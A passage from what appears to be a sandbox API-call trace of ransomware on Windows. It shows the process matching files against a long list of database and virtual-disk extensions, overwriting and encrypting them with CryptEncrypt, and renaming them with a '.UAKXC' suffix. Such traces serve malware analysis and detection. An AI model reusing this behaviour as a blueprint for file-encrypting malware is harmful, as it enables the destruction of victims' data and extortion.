Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".xld") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".abs") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".abx") returned 0x0 [0141.112] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".adn") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".db2") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".icg") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".icr") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".lut") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".maw") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".raw") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".bin") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0141.113] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0141.114] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0141.114] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0141.114] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0141.114] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".iso") returned 0x0 [0141.114] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.114] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.115] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.115] SetEndOfFile (hFile=0x6c4) returned 1 [0141.115] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.116] ReadFile (in: hFile=0x6c4, lpBuffer=0x5030000, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x16a, lpOverlapped=0x0) returned 1 [0141.116] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.116] WriteFile (in: hFile=0x6c4, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x16a, lpOverlapped=0x0) returned 1 [0141.116] CloseHandle (hObject=0x6c4) returned 1 [0141.119] GetProcessHeap () returned 0xea0000 [0141.119] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xefe4b8 [0141.119] lstrcpyW (in: lpString1=0xefe4b8, lpString2="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" [0141.119] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.UAKXC" [0141.119] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn.uakxc")) returned 1 [0141.121] GetProcessHeap () returned 0xea0000 [0141.121] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefe4b8 | out: hHeap=0xea0000) returned 1 [0141.121] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddb20 | out: hHeap=0xea0000) returned 1 [0141.121] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2628 | out: hHeap=0xea0000) returned 1 [0141.121] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0141.121] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0141.121] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0141.122] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn")) returned 0x2022 [0141.123] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0141.124] GetLastError () returned 0x0 [0141.124] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=344) returned 1 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.124] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.125] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.126] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.127] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.128] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.129] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.130] StrStrIW 